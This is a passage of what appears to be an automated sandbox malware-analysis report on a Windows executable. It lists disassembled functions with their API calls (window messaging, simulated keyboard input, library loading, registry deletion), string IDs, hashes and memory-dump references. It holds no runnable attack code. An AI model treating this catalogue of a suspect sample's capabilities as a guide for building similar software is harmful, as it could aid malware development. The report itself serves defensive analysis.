                                                                              • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                              • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                                                                              • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                              • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                                                                              Function 0045F132 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                              • String ID: 0
                                                                              • API String ID: 1173514356-4108050209
                                                                              • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                              • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                                                                              • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                              • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                                                                              Function 004692E4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                              • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 763830540-1403004172
                                                                              • Opcode ID: 509af3a058f8d2ccd68eb6fec456bdedc6df801b0ffdee10d368a4f30f08f539
                                                                              • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                                                              • Opcode Fuzzy Hash: 509af3a058f8d2ccd68eb6fec456bdedc6df801b0ffdee10d368a4f30f08f539
                                                                              • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                                                              Function 00443981 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                                • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,74DF2EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentHandleProcess$Duplicate
                                                                              • String ID: nul
                                                                              • API String ID: 2124370227-2873401336
                                                                              • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                              • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                                              • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                              • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                                              Function 00443887 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                                • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,74DF2EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentHandleProcess$Duplicate
                                                                              • String ID: nul
                                                                              • API String ID: 2124370227-2873401336
                                                                              • Opcode ID: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                              • Instruction ID: 183321404fa0000a7fb955016a75d3ae5bd0bbc3c7f5d4043dd6f74a8503dfc6
                                                                              • Opcode Fuzzy Hash: 1c1504a6ed80816e8cc684f5e798812a6452e5ed6eae5ac994518d836d8835bd
                                                                              • Instruction Fuzzy Hash: 4E2182701002019BE210DF28DC45F9BB7E4AF54B34F204A1EF9E4962D0E7759654CB56
                                                                              Function 004412AE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84windowlibraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                              • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                              • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                              • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                              • String ID: SysAnimate32
                                                                              • API String ID: 3529120543-1011021900
                                                                              • Opcode ID: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                              • Instruction ID: 28effd0bdeb99d0e0a50349a2d6ccdc4655b9339127a2247ff1827a793b197f6
                                                                              • Opcode Fuzzy Hash: 7eb070968e116bc4f0d30e0eba70c7f8d943bdaa5f5f9b6b4db71aa758301bcd
                                                                              • Instruction Fuzzy Hash: D0216271204301ABF7209AA5DC84F6B73ECEBD9724F104A1EF651D72E0D6B4DC818729
                                                                              Function 00443009 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 82windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                              • TranslateMessage.USER32(?), ref: 0044308B
                                                                              • DispatchMessageW.USER32(?), ref: 00443096
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Peek$DispatchTranslate
                                                                              • String ID: *.*
                                                                              • API String ID: 1795658109-438819550
                                                                              • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                              • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                                                              • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                              • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                                              Function 004609BD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                              • GetFocus.USER32 ref: 004609EF
                                                                                • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                                • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                              • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                                                                              • __swprintf.LIBCMT ref: 00460A7A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                                              • String ID: %s%d
                                                                              • API String ID: 991886796-1110647743
                                                                              • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                              • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                                              • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                              • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                                              Function 0040F790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$_sprintf
                                                                              • String ID: %02X
                                                                              • API String ID: 891462717-436463671
                                                                              • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                              • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                                                                              • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                              • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                                                                              Function 0040F3B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0042CD00
                                                                              • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                                • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\r6lOHDg9N9.exe,?,C:\Users\user\Desktop\r6lOHDg9N9.exe,004A8E80,C:\Users\user\Desktop\r6lOHDg9N9.exe,0040F3D2), ref: 0040FFCA
                                                                                • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                                • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                                • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                              • String ID: $OH$@OH$X
                                                                              • API String ID: 3491138722-1394974532
                                                                              • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                              • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                                              • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                              • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                              Function 00463D7E Relevance: 7.6, APIs: 5, Instructions: 141libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                              • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                                                              • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                                                              • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                              • String ID:
                                                                              • API String ID: 2449869053-0
                                                                              • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                              • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                                              • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                              • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                                              Function 0044C379 Relevance: 7.6, APIs: 5, Instructions: 137windowkeyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                                              • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                                              • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                                              • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                                              • SendInput.USER32 ref: 0044C509
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: KeyboardMessagePostState$InputSend
                                                                              • String ID:
                                                                              • API String ID: 3031425849-0
                                                                              • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                              • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                                              • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                              • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                                                                              Function 004422B9 Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                              • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Enum$CloseDeleteOpen
                                                                              • String ID:
                                                                              • API String ID: 2095303065-0
                                                                              • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                              • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                                              • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                              • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                              Function 0045C277 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                                                                              • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                                                                              • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfile$SectionWrite$String
                                                                              • String ID:
                                                                              • API String ID: 2832842796-0
                                                                              • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                              • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                              • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                              • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                              Function 0044796B Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClientRect.USER32(?,?), ref: 00447997
                                                                              • GetCursorPos.USER32(?), ref: 004479A2
                                                                              • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                              • WindowFromPoint.USER32(?,?), ref: 004479FF
                                                                              • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 1822080540-0
                                                                              • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                              • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                              • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                              • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                              Function 00447BAF Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                              • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                              • EndPaint.USER32(?,?), ref: 00447CD1
                                                                              Memory Dump Source
